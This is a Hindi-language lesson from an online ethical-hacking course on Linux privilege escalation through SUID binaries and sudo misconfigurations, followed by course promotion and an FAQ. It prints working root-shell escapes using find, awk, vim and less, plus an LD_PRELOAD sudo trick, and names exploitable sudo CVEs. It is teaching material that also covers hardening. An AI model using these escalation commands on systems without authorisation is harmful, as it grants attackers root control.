Ethical Hacking Academy · पाठ

SUID और Sudo का दुरुपयोग

ग़लत कॉन्फ़िगरेशन

पाठ 2, कुल 4 में से13 चरण

SUID और Sudo का दुरुपयोग, CoddyKit पर Ethical Hacking Academy का एक निःशुल्क पाठ है। यह 4 में से 2वाँ पाठ है। आप नीचे पूरा पाठ निःशुल्क पढ़ सकते हैं—फिर अंतर्निहित कोड संपादक और 24/7 एआई ट्यूटर के साथ ब्राउज़र में इसका व्यावहारिक अभ्यास कर सकते हैं। यह Ethical Hacking Academy सीखने के मार्ग का हिस्सा है और आपकी प्रगति वेब तथा CoddyKit ऐप पर सिंक होती रहती है। Ethical Hacking Academy पाठ्यक्रम में कुल 4 पाठ शामिल हैं।

SUID बिट

SUID अनुमति-बिट किसी फ़ाइल को उसे चलाने वाले उपयोगकर्ता के बजाय उसके स्वामी के विशेषाधिकारों के साथ चलाता है। जब स्वामी root हो, तो SUID बाइनरी root के रूप में चलती है — passwd जैसे टूल के लिए उपयोगी, लेकिन दुरुपयोग होने पर खतरनाक।

-rwsr-xr-x  1 root root  /usr/bin/passwd
# the s in rws = SUID bit

SUID बाइनरी खोजना

हर SUID फ़ाइल की गणना करें और उसकी तुलना ज्ञात-सुरक्षित आधाररेखा से करें। असामान्य वस्तु — टेक्स्ट संपादक, इंटरप्रेटर या कस्टम बाइनरी — एक संभावित उम्मीदवार है।

find / -perm -4000 -type f 2>/dev/null

GTFOBins

GTFOBins ऐसी चुनी हुई सूची है जिसमें बताया गया है कि मानक Unix बाइनरी को SUID या sudo अधिकार मिलने पर बाहर निकलने, विशेषाधिकार बढ़ाने या फ़ाइलें पढ़ने/लिखने के लिए कैसे दुरुपयोग किया जा सकता है। मिली हुई हर बाइनरी को GTFOBins में अवश्य जाँचें।

# gtfobins.github.io -> search the binary name

SUID find का दुरुपयोग

यदि find में SUID बिट है, तो उसका -exec विकल्प root के रूप में कमांड चलाता है और तुरंत root शेल दे सकता है।

find . -exec /bin/sh -p \; -quit
# -p preserves the elevated privileges

SUID शेल एस्केप

कई इंटरप्रेटर और पेजर शेल शुरू कर सकते हैं। SUID वाला vim, less, awk या python आपको root शेल में पहुँचा सकता है।

awk "BEGIN {system(\"/bin/sh -p\")}"
# or in less:  !/bin/sh

Sudo की गलत कॉन्फ़िगरेशन

अनुमत कमांड की सूची देखने के लिए sudo -l चलाएँ। ऐसी प्रविष्टियाँ जो आपको किसी असुरक्षित बाइनरी को root के रूप में चलाने देती हैं या NOPASSWD का उपयोग करती हैं, तुरंत सफलता दे सकती हैं। कमांड का शेल होना आवश्यक नहीं है — GTFOBins कई कमांड से बाहर निकलने के तरीके दिखाता है।

sudo -l
# (ALL) NOPASSWD: /usr/bin/vim

संपादक या पेजर पर Sudo

यदि आप sudo vim (या less, more, man, nano के रूपांतर) चला सकते हैं, तो प्रोग्राम के भीतर से root के रूप में शेल खोल सकते हैं।

sudo vim -c ":!/bin/sh"
# inside less:  sudo less file  ->  !/bin/sh

LD_PRELOAD युक्ति

यदि sudo LD_PRELOAD को बनाए रखता है (env_keep के माध्यम से), तो आप एक दुर्भावनापूर्ण साझा लाइब्रेरी लोड कर सकते हैं जो sudo कमांड शुरू होने पर root के रूप में चलती है।

sudo -l  # look for env_keep+=LD_PRELOAD
sudo LD_PRELOAD=/tmp/evil.so program

Sudo संस्करण की कमज़ोरियाँ

कुछ sudo संस्करणों में खामियाँ होती हैं — जैसे Baron Samedit (CVE-2021-3156) हीप ओवरफ़्लो और -u#-1 बायपास (CVE-2019-14287)। sudo --version की तुलना ज्ञात CVE से करें।

sudo --version
# vulnerable < 1.9.5p2 -> Baron Samedit

कस्टम SUID बाइनरी

डेवलपर कभी-कभी ऐसे कस्टम SUID सहायक प्रोग्राम भेजते हैं जो पूर्ण पथ के बिना नाम से अन्य प्रोग्राम चलाते हैं। यदि आप PATH नियंत्रित करते हैं, तो उस कॉल को हाईजैक कर सकते हैं — इससे आगे बताई गई PATH-दुरुपयोग तकनीकों तक पहुँचा जा सकता है।

सुरक्षा सुदृढ़ीकरण और नैतिकता

रक्षकों को SUID बाइनरी की संख्या घटानी चाहिए, पूर्ण पथों का उपयोग करना चाहिए, विशेषाधिकार जल्दी छोड़ देने चाहिए और कड़े नियमों के साथ sudo को अद्यतन रखना चाहिए। परीक्षक के रूप में इनका शोषण केवल अपने अधिकृत दायरे में करें।

त्वरित जाँच

SUID/sudo से जुड़े अपने ज्ञान की जाँच करें।

पुनरावलोकन

आपने SUID और sudo के दुरुपयोग के बारे में सीखा:

  • SUID बाइनरी को उसके स्वामी (अक्सर root) के रूप में चलाता है
  • मिली हुई बाइनरी की जाँच GTFOBins में करें
  • SUID/sudo find, vim, awk, less के माध्यम से शेल एस्केप संभव हैं
  • LD_PRELOAD और sudo CVE (Baron Samedit) भी विशेषाधिकार बढ़ा सकते हैं

अगला विषय: cron जॉब और PATH का दुरुपयोग।

शुरुआत निःशुल्क

एआई शिक्षक के साथ Ethical Hacking Academy सीखें — निःशुल्क

अपने ब्राउज़र में वास्तविक कोड लिखें और चलाएँ, चौबीसों घंटे एआई शिक्षक से तुरंत सहायता पाएँ, और वेब या ऐप पर वहीं से शुरू करें जहाँ आपने छोड़ा था।

पाठ्यक्रम
31
पाठ
111

अक्सर पूछे जाने वाले प्रश्न

क्या “SUID और Sudo का दुरुपयोग” पाठ निःशुल्क है?

हाँ—“SUID और Sudo का दुरुपयोग” का पूरा पाठ यहाँ वेब पर निःशुल्क पढ़ा जा सकता है। इंटरैक्टिव अभ्यास (अंतर्निहित कोड संपादक और 24/7 एआई ट्यूटर) करने और Ethical Hacking Academy पाठ्यक्रम का बाकी हिस्सा अनलॉक करने के लिए CoddyKit PRO लें। Ethical Hacking Academy पाठ्यक्रम में कुल 4 पाठ शामिल हैं।

“SUID और Sudo का दुरुपयोग” में मैं क्या सीखूँगा?

ग़लत कॉन्फ़िगरेशन आप ब्राउज़र में सीधे चलाए जाने वाले व्यावहारिक कोड के साथ Ethical Hacking Academy का अभ्यास करते हैं, और पाठ पूरा करते समय 24/7 एआई ट्यूटर आपके प्रश्नों के उत्तर देता है।

क्या Ethical Hacking Academy शुरू करने के लिए मुझे किसी अनुभव की आवश्यकता है?

पहले के अनुभव की आवश्यकता नहीं है। CoddyKit पर Ethical Hacking Academy शुरुआती से लेकर उन्नत शिक्षार्थियों तक सभी के लिए व्यवस्थित किया गया है, इसलिए आप यहीं से या शुरुआत से सीखना शुरू कर सकते हैं और अपनी गति से आगे बढ़ सकते हैं। यह 4 में से 2वाँ पाठ है।

“SUID और Sudo का दुरुपयोग” पाठ पूरा करने में कितना समय लगता है?

CoddyKit का अधिकांश पाठ लगभग 5–10 मिनट में पूरा हो जाता है। हर पाठ छोटा और संवादात्मक है, इसलिए आप लगातार प्रगति करते हैं और वेब या ऐप पर वहीं से सीखना जारी रख सकते हैं जहाँ आपने छोड़ा था।

क्या मैं इस Ethical Hacking Academy पाठ में कोड लिख और चला सकता हूँ?

हाँ। हर Ethical Hacking Academy पाठ में एक अंतर्निर्मित कोड संपादक शामिल है, जिससे आप सीधे अपने ब्राउज़र में वास्तविक कोड लिख और चला सकते हैं और तुरंत एआई प्रतिक्रिया पा सकते हैं—स्थानीय सेटअप की आवश्यकता नहीं है।

इस पाठ्यक्रम के सभी पाठ

  1. एन्यूमरेशन
  2. SUID और Sudo का दुरुपयोग
  3. Cron जॉब और PATH
  4. कर्नेल एक्सप्लॉइट
← Ethical Hacking Academy पर वापस जाएँ